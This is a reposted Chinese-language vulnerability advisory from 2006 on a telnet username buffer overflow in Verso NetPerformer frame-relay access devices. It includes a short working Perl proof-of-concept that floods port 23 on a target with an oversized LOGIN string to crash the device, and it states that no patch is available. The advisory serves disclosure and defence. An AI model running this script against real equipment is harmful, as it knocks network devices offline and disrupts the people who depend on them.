[转载]Verso NetPerformer帧中继访问设备超长telnet用户名溢出漏洞
信息来源:绿盟科技Verso NetPerformer帧中继访问设备超长telnet用户名溢出漏洞
发布日期:2006-09-13
更新日期:2006-09-14
受影响系统:
Verso Technologies NetPerformer FRAD ACT SDM-9500 series
Verso Technologies NetPerformer FRAD ACT SDM-9300 series
Verso Technologies NetPerformer FRAD ACT SDM-9200 series
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19989
Verso NetPerformer是基于SIP的语音和数据路由器,结合了数据路由器和语音网关的功能。
NetPerformer的telnet访问接口在处理用户名时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞导致设备拒绝服务。
如果攻击者能够对NetPerformer帧中继访问设备(FRAD)的telnet服务传送超长用户名(大于4550字符)的话,就会触发缓冲区溢出,导致设备重启或执行任意指令。
<*来源:Arif Jatmoko ([email]arif.jatmoko@sea.ccamatil.com[/email])
链接:[url]http://marc.theaimsgroup.com/?l=bugtraq&m=115816721617893&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# __START_CODE
#
#!/usr/bin/perl
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "23",
Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE
建议:
--------------------------------------------------------------------------------
厂商补丁:
Verso Technologies
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://www.verso.com/enterprise/netperformer/index.asp[/url]
页:
[1]